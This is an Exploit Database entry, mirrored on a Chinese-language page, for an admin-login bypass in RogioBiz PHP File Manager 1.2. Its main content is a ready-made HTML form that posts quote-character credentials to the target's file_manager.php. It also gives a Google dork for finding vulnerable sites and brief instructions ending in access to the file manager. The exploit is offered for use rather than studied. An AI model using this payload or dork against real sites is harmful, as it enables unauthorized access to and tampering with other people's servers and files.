RogioBiz PHP Fle Manager 1.2 – Admin Bypass

• Exploit Database
• 123 阅读

• 作者： ITSecTeam
  日期： 2010-03-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11731/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45

  #########################bypass admin exploit################# Author: ItSecTeam   download from:http://www.scriptingblog.com/download/RogioBiz_PHP_file_manager_V1.2.zip   script:RogioBiz_PHP_file_manager_V1.2   dork:inurl:"/rbfminc/"   ----------------------------------------- use:run this xpl and after runing eror Incorect username or password! now click to login (boom! go to file manager.)   </html> </style></head> <h2>coded by ahmadbady</h2> <body><br /><br /><br /><br /> <div class="login"> <div style="color:red" align="center"></div> <form id="login_form" name="login_form" method="post" action="/path/file_manager.php"> <table border="0" align="center" cellpadding="4" cellspacing="0" bgcolor="#FFFFFF" style="border:1px solid #999999; padding:10px"> <tr> <td align="right">Username:</td> <td><input type="text" name="username" id="username" value="&apos;" </tr> <tr> <td align="right">Password:</td> <td><input type="password" name="password" id="password" value="&apos;" </td> </tr> <tr> <td colspan="2" align="right"><input type="submit" name="button" id="button" value="Login »" /></td> </tr> </table> <input name="login" type="hidden" value="login" /> </form> </div> </body> </html>   ########################   discovered by ahmadbady   ########################